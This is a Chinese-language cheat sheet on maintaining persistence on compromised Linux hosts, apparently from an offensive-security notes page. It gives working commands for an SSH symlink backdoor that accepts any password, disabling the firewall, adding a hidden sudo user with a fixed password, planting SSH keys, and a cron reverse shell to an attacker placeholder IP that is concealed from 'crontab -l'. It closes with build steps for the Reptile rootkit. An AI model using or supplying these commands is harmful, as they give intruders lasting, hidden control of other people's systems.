权限维持-Linux后门
大约 1 分钟
SSH软连接后门
#建立sshd的软连接
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=12345
systemctl stop firewalld
#连接目标,密码随便输入即可
ssh root@212.1x9.2xx.xx7 -p12345
#删除后门
rm -rf /tmp/su
增加超级用户账号
如果系统不允许uid=0的用户(root)远程登录,可以添加一个普通用户,并将其加入sudoers
增加用户
#添加账户,设置密码(密码符合要密码强度策略)
useradd phP
echo @admin.886|passwd --stdin phP
#修改sudoers赋予sudo权限
chmod +w /etc/sudoers
echo "phP ALL=(ALL) ALL" >> /etc/sudoers
chmod -w /etc/sudoers
SSH公钥登录
#本机生成rsa公钥
ssh-keygen -t rsa
#把id_rsa.pub写入服务端的authorized_keys中
chmod 600 ~/.ssh/authorized_keys
chmod 700 ~/.ssh
echo "id_rsa.pub的内容" > ~/.ssh/authorized_keys
#没有这个文件的话,就自己创建一个
mkdir -p ~/.ssh
touch ~/.ssh/authorized_keys
Crontab定时反弹shell
(crontab -l;printf "*/1 * * * * exec 9<> /dev/tcp/攻击者IP/8888;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -
#每分钟执行一次,并且crontab -l看不出来
#这种要用crontab -e 进去查看并编辑才能看到
RootKit
https://github.com/f0rb1dd3n/Reptile
特点
Ø网络隐藏(TCP/UDP)
Ø文件隐藏
Ø进程隐藏
Ø持久性隐藏(自启动)
Ø本地权限提升
ØICMP/UDP/TCP 端口锁定后门
Ø具有文件传输功能的完整 TTY/PTY Shell
Ø外壳每 X 次回连(非默认)
安装服务端
yum install -y ncurses-devel
make menuconfig
make #设置好配置后,只需运行 make,它就会生成所需的一切
make install #安装
安装客户端
yum install readline-devel
make client #编译客户端
./client #运行客户端